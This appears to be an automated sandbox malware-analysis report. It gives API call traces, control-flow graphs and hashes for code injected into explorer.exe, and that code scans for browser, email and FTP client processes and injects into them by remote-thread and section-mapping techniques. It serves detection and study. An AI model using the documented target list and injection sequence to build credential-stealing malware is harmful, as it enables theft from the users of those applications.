                                                                                                                                      control_flow_graph 49 d9d748-d9d74b 50 d9d755-d9d759 49->50 51 d9d75b-d9d763 50->51 52 d9d765 50->52 51->52 53 d9d74d-d9d753 52->53 54 d9d767 52->54 53->50 55 d9d76a-d9d771 54->55 57 d9d77d 55->57 58 d9d773-d9d77b 55->58 57->55 59 d9d77f-d9d782 57->59 58->57 60 d9d784-d9d792 59->60 61 d9d797-d9d7a4 59->61 62 d9d7ce-d9d7e9 60->62 63 d9d794-d9d795 60->63 75 d9d7be-d9d7cc call d9d70a 61->75 76 d9d7a6-d9d7a8 61->76 64 d9d81a-d9d81d 62->64 63->61 66 d9d81f-d9d820 64->66 67 d9d822-d9d829 64->67 68 d9d801-d9d805 66->68 69 d9d82f-d9d833 67->69 73 d9d7eb-d9d7ee 68->73 74 d9d807-d9d80a 68->74 71 d9d835-d9d84e LoadLibraryA 69->71 72 d9d884-d9d88d 69->72 78 d9d84f-d9d856 71->78 80 d9d890-d9d899 72->80 73->67 79 d9d7f0 73->79 74->67 81 d9d80c-d9d810 74->81 75->50 82 d9d7ab-d9d7b2 76->82 78->69 86 d9d858-d9d86e 78->86 83 d9d7f1-d9d7f5 79->83 87 d9d89b-d9d89d 80->87 88 d9d8be-d9d90e VirtualProtect * 2 80->88 81->83 84 d9d812-d9d819 81->84 94 d9d7bc 82->94 95 d9d7b4-d9d7ba 82->95 83->68 91 d9d7f7-d9d7f9 83->91 84->64 100 d9d879-d9d883 86->100 101 d9d870-d9d877 86->101 92 d9d89f-d9d8ae 87->92 93 d9d8b0-d9d8bc 87->93 90 d9d912-d9d917 88->90 90->90 96 d9d919-d9d928 90->96 91->68 98 d9d7fb-d9d7ff 91->98 92->80 93->92 94->75 94->82 95->94 98->68 98->74 101->78
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00D9D847
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D9D8E5
                                                                                                                                      • VirtualProtect.KERNELBASE ref: 00D9D903
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D9C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D9C000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d9c000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                      • Instruction ID: 97ec423f4080a91f5edac6383836aba4370f5149e8e0ff6267192e0c183d4e60
                                                                                                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                      • Instruction Fuzzy Hash: 6951583265891D4BCF24AA7C9CC43F5B7D2FB59325B58063AC4DAC3286EA58D846C3A1

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 102 d91b74-d91b94 OpenFileMappingA 103 d91bb7-d91bc4 102->103 104 d91b96-d91bb4 MapViewOfFile 102->104 104->103
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                      • Instruction ID: 34260680a0de21a2122676161a6a1a52380837dcd61023cfceb71d7bc175a71e
                                                                                                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                      • Instruction Fuzzy Hash: 5FF08235314F094FAB44EF7C9C8C136B7E1EBA8202B04867E984AC7164EF34C8808711

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 127 d93f20-d93f41 StrStrIA 128 d93f43-d93f4f call d93e4c 127->128 129 d93f52-d93f5e 127->129 128->129
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3926288254.0000000000D91000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_d91000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ff82d68b917e3fc31d0b9a1cb0f2d3a54b363e9994e49f468131ccfdc4c4d25c
                                                                                                                                      • Instruction ID: 289dd54117b555261d1004c836f1f85964f2fa47907cdb0a344ebe705251a5e0
                                                                                                                                      • Opcode Fuzzy Hash: ff82d68b917e3fc31d0b9a1cb0f2d3a54b363e9994e49f468131ccfdc4c4d25c
                                                                                                                                      • Instruction Fuzzy Hash: C6E04F30708B095B9B48EFA9A8D853732E1DBAC311B54423DB419C7154DA78CA458761

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:306
                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                      execution_graph 708 3001000 709 3001010 708->709 710 3001007 708->710 712 3001016 710->712 762 3002608 VirtualQuery 712->762 715 3001097 715->709 717 300102c RtlMoveMemory 718 3001071 GetCurrentProcessId 717->718 719 300104d 717->719 723 3001092 718->723 724 300109e 718->724 799 3002861 GetProcessHeap RtlAllocateHeap 719->799 721 3001052 RtlMoveMemory 721->718 723->715 725 3001095 723->725 765 30010a4 724->765 800 3001332 725->800 727 30010a3 729 3002861 GetProcessHeap RtlAllocateHeap 727->729 730 30010cc 729->730 731 30010dc CreateToolhelp32Snapshot 730->731 732 30010f0 Process32First 731->732 733 3001322 Sleep 731->733 734 300131b CloseHandle 732->734 735 300110c lstrcmpiA 732->735 733->731 734->733 736 3001124 lstrcmpiA 735->736 759 3001280 735->759 737 3001138 lstrcmpiA 736->737 736->759 739 300114c lstrcmpiA 737->739 737->759 738 30025ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->759 740 3001160 lstrcmpiA 739->740 739->759 742 3001170 lstrcmpiA 740->742 740->759 741 3001305 Process32Next 741->735 743 3001319 741->743 744 3001184 lstrcmpiA 742->744 742->759 743->734 745 3001198 lstrcmpiA 744->745 744->759 746 30011ac lstrcmpiA 745->746 745->759 747 30011c0 lstrcmpiA 746->747 746->759 748 30011d4 lstrcmpiA 747->748 747->759 750 30011e8 lstrcmpiA 748->750 748->759 749 3002608 VirtualQuery 749->759 751 30011fc lstrcmpiA 750->751 750->759 752 300120c lstrcmpiA 751->752 751->759 754 300121c lstrcmpiA 752->754 752->759 753 30012ae lstrcmpiA 753->759 755 300122c lstrcmpiA 754->755 754->759 756 300123c lstrcmpiA 755->756 755->759 758 300124c lstrcmpiA 756->758 756->759 757 3001819 30 API calls 757->759 758->759 760 300125c lstrcmpiA 758->760 759->738 759->741 759->749 759->753 759->757 760->759 761 300126c lstrcmpiA 760->761 761->741 761->759 763 300101e 762->763 763->715 764 3002861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 3002861 GetProcessHeap RtlAllocateHeap 765->827 767 30010cc 768 30010dc CreateToolhelp32Snapshot 767->768 769 30010f0 Process32First 768->769 770 3001322 Sleep 768->770 771 300131b CloseHandle 769->771 772 300110c lstrcmpiA 769->772 770->768 771->770 773 3001124 lstrcmpiA 772->773 779 3001280 772->779 774 3001138 lstrcmpiA 773->774 773->779 776 300114c lstrcmpiA 774->776 774->779 777 3001160 lstrcmpiA 776->777 776->779 777->779 780 3001170 lstrcmpiA 777->780 778 3001305 Process32Next 778->772 781 3001319 778->781 779->778 787 3002608 VirtualQuery 779->787 791 30012ae lstrcmpiA 779->791 828 30025ad OpenProcess 779->828 834 3001819 779->834 780->779 782 3001184 lstrcmpiA 780->782 781->771 782->779 783 3001198 lstrcmpiA 782->783 783->779 784 30011ac lstrcmpiA 783->784 784->779 785 30011c0 lstrcmpiA 784->785 785->779 786 30011d4 lstrcmpiA 785->786 786->779 788 30011e8 lstrcmpiA 786->788 787->779 788->779 789 30011fc lstrcmpiA 788->789 789->779 790 300120c lstrcmpiA 789->790 790->779 792 300121c lstrcmpiA 790->792 791->779 792->779 793 300122c lstrcmpiA 792->793 793->779 794 300123c lstrcmpiA 793->794 794->779 796 300124c lstrcmpiA 794->796 796->779 797 300125c lstrcmpiA 796->797 797->779 798 300126c lstrcmpiA 797->798 798->778 798->779 799->721 880 3002861 GetProcessHeap RtlAllocateHeap 800->880 802 3001340 GetModuleFileNameA 881 3002861 GetProcessHeap RtlAllocateHeap 802->881 804 3001357 GetCurrentProcessId wsprintfA 882 300263e CryptAcquireContextA 804->882 807 300139c Sleep 887 30024d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 300140d 905 3002843 808->905 811 30013ae GetModuleHandleA GetProcAddress 814 30013c9 811->814 815 30013da GetModuleHandleA GetProcAddress 811->815 813 3002843 3 API calls 816 300141b RtlExitUserThread 813->816 895 3001de3 814->895 818 30013f5 815->818 819 3001406 815->819 820 3001425 816->820 821 3001de3 3 API calls 818->821 822 30024d5 10 API calls 819->822 823 300144b 820->823 824 3002608 VirtualQuery 820->824 821->819 822->808 823->724 825 300143a 824->825 825->823 910 3001493 825->910 827->767 829 3002600 828->829 830 30025cb IsWow64Process 828->830 829->779 831 30025ee 830->831 832 30025dc IsWow64Process 830->832 833 30025f9 CloseHandle 831->833 832->831 832->833 833->829 835 3002608 VirtualQuery 834->835 836 3001833 835->836 837 3001845 OpenProcess 836->837 838 3001a76 836->838 837->838 839 300185e 837->839 838->779 840 3002608 VirtualQuery 839->840 841 3001865 840->841 841->838 842 3001873 NtSetInformationProcess 841->842 843 300188f 841->843 842->843 865 3001a80 843->865 846 3001a80 2 API calls 847 30018d6 846->847 848 3001a73 CloseHandle 847->848 849 3001a80 2 API calls 847->849 848->838 850 3001900 849->850 871 3001b17 850->871 853 3001a80 2 API calls 854 3001930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 3001985 854->855 856 3001a4e CreateRemoteThread 854->856 858 300198b CreateMutexA GetLastError 855->858 861 30019bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 857 3001a65 CloseHandle 856->857 859 3001a67 CloseHandle CloseHandle 857->859 858->855 860 30019a7 CloseHandle Sleep 858->860 859->848 860->858 862 3001a47 861->862 863 30019ec WriteProcessMemory 861->863 862->857 862->859 863->862 864 3001a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 3001a94 865->866 867 30018b4 865->867 868 3001aa4 NtCreateSection 866->868 869 3001ac3 866->869 867->846 868->869 869->867 870 3001ad8 NtMapViewOfSection 869->870 870->867 872 3001b2e 871->872 878 3001b60 871->878 874 3001b30 RtlMoveMemory 872->874 873 3001bc3 875 3001910 NtUnmapViewOfSection 873->875 877 3001be1 LdrProcessRelocationBlock 873->877 874->874 874->878 875->853 876 3001b71 LoadLibraryA 876->875 876->878 877->873 877->875 878->873 878->876 879 3001ba1 GetProcAddress 878->879 879->875 879->878 880->802 881->804 883 3002664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 3001384 CreateMutexA GetLastError 882->884 885 30026aa wsprintfA 883->885 884->807 884->808 885->885 886 30026cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 3002515 887->888 889 3002565 CloseHandle 888->889 890 3002555 Thread32Next 888->890 891 3002521 OpenThread 888->891 889->811 890->888 892 3002544 ResumeThread 891->892 893 300253c SuspendThread 891->893 894 300254a CloseHandle 892->894 893->894 894->890 896 3001e56 895->896 897 3001ded 895->897 896->815 897->896 937 3001e93 VirtualProtect 897->937 899 3001e04 899->896 938 3002815 VirtualAlloc 899->938 901 3001e10 902 3001e1a RtlMoveMemory 901->902 903 3001e2d 901->903 902->903 939 3001e93 VirtualProtect 903->939 906 3002608 VirtualQuery 905->906 907 300284b 906->907 908 3001414 907->908 909 300284f GetProcessHeap HeapFree 907->909 908->813 909->908 911 30014c0 910->911 912 30014a1 910->912 914 3001510 911->914 915 30014c8 911->915 940 30017c7 912->940 959 30026e6 lstrlen lstrlen 914->959 917 30017c7 5 API calls 915->917 934 30014b6 915->934 919 30014e0 917->919 919->934 947 3001647 919->947 920 300155f 921 30026e6 2 API calls 920->921 924 300156c 921->924 922 3001532 961 3001752 GetModuleHandleA GetProcAddress 922->961 927 30015a0 924->927 928 3001584 924->928 924->934 930 3002404 5 API calls 927->930 927->934 964 3002404 lstrlen 928->964 933 30015ac 930->933 931 3001647 11 API calls 931->934 933->934 935 3001647 11 API calls 933->935 934->823 936 30014fb 935->936 936->934 970 30015e0 936->970 937->899 938->901 939->896 941 3001812 940->941 942 30017d1 940->942 941->934 942->941 943 30026e6 2 API calls 942->943 944 30017f1 943->944 944->941 975 3002861 GetProcessHeap RtlAllocateHeap 944->975 946 3001804 RtlMoveMemory 946->941 948 3001660 947->948 958 3001745 947->958 949 3001671 lstrlen 948->949 948->958 950 3001683 lstrlen 949->950 949->958 951 3001690 getpeername 950->951 950->958 952 30016ae inet_ntoa htons 951->952 951->958 953 30016cc 952->953 952->958 953->958 976 3002861 GetProcessHeap RtlAllocateHeap 953->976 955 3001717 wsprintfA 956 300173a 955->956 957 3002843 3 API calls 956->957 956->958 957->958 958->936 960 300151d 959->960 960->920 960->922 962 3001539 961->962 963 3001776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->931 962->934 963->962 965 3002456 964->965 966 300241c CryptStringToBinaryA 964->966 965->934 966->965 967 3002438 966->967 977 3002861 GetProcessHeap RtlAllocateHeap 967->977 969 3002444 CryptStringToBinaryA 969->965 971 3002843 3 API calls 970->971 972 30015f5 971->972 973 3002843 3 API calls 972->973 974 30015fc 973->974 974->934 975->946 976->955 977->969 987 3001425 988 3001432 987->988 989 300144b 987->989 990 3002608 VirtualQuery 988->990 991 300143a 990->991 991->989 992 3001493 23 API calls 991->992 992->989 993 3002806 VirtualFree 994 3001eb6 995 3001ed9 994->995 996 3001ecc lstrlen 994->996 1005 3002861 GetProcessHeap RtlAllocateHeap 995->1005 996->995 998 3001ee1 lstrcat 999 3001f16 lstrcat 998->999 1000 3001f1d 998->1000 999->1000 1006 3001f4a 1000->1006 1003 3002843 3 API calls 1004 3001f40 1003->1004 1005->998 1040 30022b8 1006->1040 1010 3001f77 1045 30027e2 lstrlen MultiByteToWideChar 1010->1045 1012 3001f86 1046 3002374 RtlZeroMemory 1012->1046 1015 300229a 1017 3002843 3 API calls 1015->1017 1016 3001fd8 RtlZeroMemory 1018 300200d 1016->1018 1019 3001f2d 1017->1019 1018->1015 1023 300203b 1018->1023 1048 30022e5 1018->1048 1019->1003 1021 3002280 1021->1015 1022 3002843 3 API calls 1021->1022 1022->1015 1023->1021 1057 3002861 GetProcessHeap RtlAllocateHeap 1023->1057 1025 300210b wsprintfW 1026 3002131 1025->1026 1030 300219e 1026->1030 1058 3002861 GetProcessHeap RtlAllocateHeap 1026->1058 1028 300216b wsprintfW 1028->1030 1029 300225d 1031 3002843 3 API calls 1029->1031 1030->1029 1059 3002861 GetProcessHeap RtlAllocateHeap 1030->1059 1032 3002271 1031->1032 1032->1021 1034 3002843 3 API calls 1032->1034 1034->1021 1035 3002256 1038 3002843 3 API calls 1035->1038 1036 30021e9 1036->1035 1060 3002815 VirtualAlloc 1036->1060 1038->1029 1039 3002243 RtlMoveMemory 1039->1035 1041 3001f69 1040->1041 1042 30022c2 1040->1042 1044 3002861 GetProcessHeap RtlAllocateHeap 1041->1044 1043 30026e6 2 API calls 1042->1043 1043->1041 1044->1010 1045->1012 1047 3001f96 1046->1047 1047->1015 1047->1016 1049 3002353 1048->1049 1051 30022f2 1048->1051 1049->1023 1050 30022f6 DnsQuery_W 1050->1051 1051->1049 1051->1050 1052 3002335 DnsFree inet_ntoa 1051->1052 1052->1051 1053 3002355 1052->1053 1061 3002861 GetProcessHeap RtlAllocateHeap 1053->1061 1055 300235f 1062 30027e2 lstrlen MultiByteToWideChar 1055->1062 1057->1025 1058->1028 1059->1036 1060->1039 1061->1055 1062->1049 978 3007728 979 3007904 978->979 980 300774b 978->980 979->979 981 300785a LoadLibraryA 980->981 985 300789f VirtualProtect VirtualProtect 980->985 982 3007871 981->982 982->980 984 3007883 GetProcAddress 982->984 984->982 986 3007899 984->986 985->979 1069 300245e lstrlen 1070 30024a5 1069->1070 1071 3002476 CryptBinaryToStringA 1069->1071 1071->1070 1072 3002489 1071->1072 1075 3002861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 3002494 CryptBinaryToStringA 1074->1070 1075->1074

Callgraph

Callgraph of 44 functions in the dumped region (Function_03001000 to Function_03007728, node ids 0-43); graph edge data omitted.

Control-flow Graph

Control-flow graph of function 03001016 (basic blocks 3001016 to 300132d; subcalls to 3002608, 3002861, 30010a4, 3001332, 30025ad, 3002592, 3002573, 3002731, 3001819); graph rendering data omitted.
APIs
  • Part of subcall function 03002608: VirtualQuery.KERNEL32(03004434,?,0000001C), ref: 03002615
  • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
  • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03001038
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 0300106B
• NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03001074
• GetCurrentProcessId.KERNEL32(?,03001010), ref: 0300107A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 030010DF
• Process32First.KERNEL32(00000000,?), ref: 030010FE
• lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0300111A
• lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0300112E
• lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03001142
• lstrcmpiA.KERNEL32(?,opera.exe), ref: 03001156
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03001166
• lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0300117A
• lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0300118E
• lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 030011A2
• lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 030011B6
• lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 030011CA
• lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 030011DE
• lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 030011F2
• lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03001206
• lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03001216
• lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03001226
• lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03001236
• lstrcmpiA.KERNEL32(?,263em.exe), ref: 03001246
• lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03001256
• lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03001266
• lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03001276
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 030012B4
• Process32Next.KERNEL32(00000000,00000128), ref: 0300130B
• CloseHandle.KERNELBASE(00000000), ref: 0300131C
• Sleep.KERNELBASE(000003E8), ref: 03001327
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
• String ID: 0-FwP,Fw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
• API String ID: 2555639992-2259378096
• Opcode ID: c34259d2f86b7862835af5171028c3b4e836549d3fc6afbf07dd56f1630ba23a
• Instruction ID: c2e38c66d8e85f4a3db730a8cc7acdc951b9d94ee96cc69f5db6fa9f26233d53
• Opcode Fuzzy Hash: c34259d2f86b7862835af5171028c3b4e836549d3fc6afbf07dd56f1630ba23a
• Instruction Fuzzy Hash: 8A71A638507305ABE749EBB1DD84E6F7BECAF45780F080969FA80C70C5DF64D5098A69

Control-flow Graph

APIs
  • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
  • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 030010DF
• Process32First.KERNEL32(00000000,?), ref: 030010FE
• lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0300111A
• lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0300112E
• lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03001142
• lstrcmpiA.KERNEL32(?,opera.exe), ref: 03001156
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03001166
• lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0300117A
• lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0300118E
• lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 030011A2
• lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 030011B6
• lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 030011CA
• lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 030011DE
• lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 030011F2
• lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03001206
• lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03001216
• lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03001226
• lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03001236
• lstrcmpiA.KERNEL32(?,263em.exe), ref: 03001246
• lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03001256
• lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03001266
• lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03001276
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 030012B4
• Process32Next.KERNEL32(00000000,00000128), ref: 0300130B
• CloseHandle.KERNELBASE(00000000), ref: 0300131C
• Sleep.KERNELBASE(000003E8), ref: 03001327
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
• String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
• API String ID: 3950187957-1680033604
• Opcode ID: ec4eac4b381b8f6afad43e11c2b4e9012596689b428583bf6b43af1fdd7ed306
• Instruction ID: 0a8ee50e13651c217a5926ada0d52eeda5f63bf67841ae8ce13fc41dc8a70ad4
• Opcode Fuzzy Hash: ec4eac4b381b8f6afad43e11c2b4e9012596689b428583bf6b43af1fdd7ed306
• Instruction Fuzzy Hash: 6251A638607305AAFB45EBB18D84E6FB6EC6F45780F0C0969FA80C70C5DF64D5098A79

Control-flow Graph

Control-flow graph of function 03007728 (basic blocks 3007728 to 300790d; calls LoadLibraryA, GetProcAddress and VirtualProtect twice); graph rendering data omitted.
Memory Dump Source
• Source File: 0000000B.00000002.3926530110.0000000003006000.00000040.80000000.00040000.00000000.sdmp, Offset: 03006000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3006000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f48b649156c5649bb4704ab3df593b5abe5b098dea6efab04fa834a199e68a6d
• Instruction ID: 43c3ee96cb96c4817a811294e984c2ff627643a06f4b850a94a9ffa860cf70bc
• Opcode Fuzzy Hash: f48b649156c5649bb4704ab3df593b5abe5b098dea6efab04fa834a199e68a6d
• Instruction Fuzzy Hash: 2D51F97194A3914FE722CA78CCC06657BE4DB42660F1D06B9C5E5C72C6E69C7806C7A1

Control-flow Graph

Control-flow graph of function 03002861: a single basic block, 3002861 to 3002871, calling GetProcessHeap and RtlAllocateHeap; graph rendering data omitted.
APIs
• GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
• RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
Memory Dump Source
• Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: c0d942bfe9c97b4abe56fdcd52574d1cf8c32b3a787c8ecf169564366cec3ff1
• Instruction ID: 2cdc7ee21af0e5ec465d3354239ff032833af8a47eda9b6cf99aabd19c1f046c
• Opcode Fuzzy Hash: c0d942bfe9c97b4abe56fdcd52574d1cf8c32b3a787c8ecf169564366cec3ff1
• Instruction Fuzzy Hash: F1A012744032007FDD4237A0AA1DF053A1CA740305F0080807189C40448A68004C8722

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002608: VirtualQuery.KERNEL32(03004434,?,0000001C), ref: 03002615
                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7556E800,microsoftedgecp.exe,?), ref: 0300184E
                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03001889
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 03001919
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,03003428,00000016), ref: 03001940
                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03001968
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03001978
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03001992
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0300199A
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 030019A8
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 030019AF
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030019C5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030019CC
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030019E2
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03001A0C
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001A1F
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A26
                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A2D
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03001A41
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03001A58
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A65
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A6B
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A71
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03001A74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
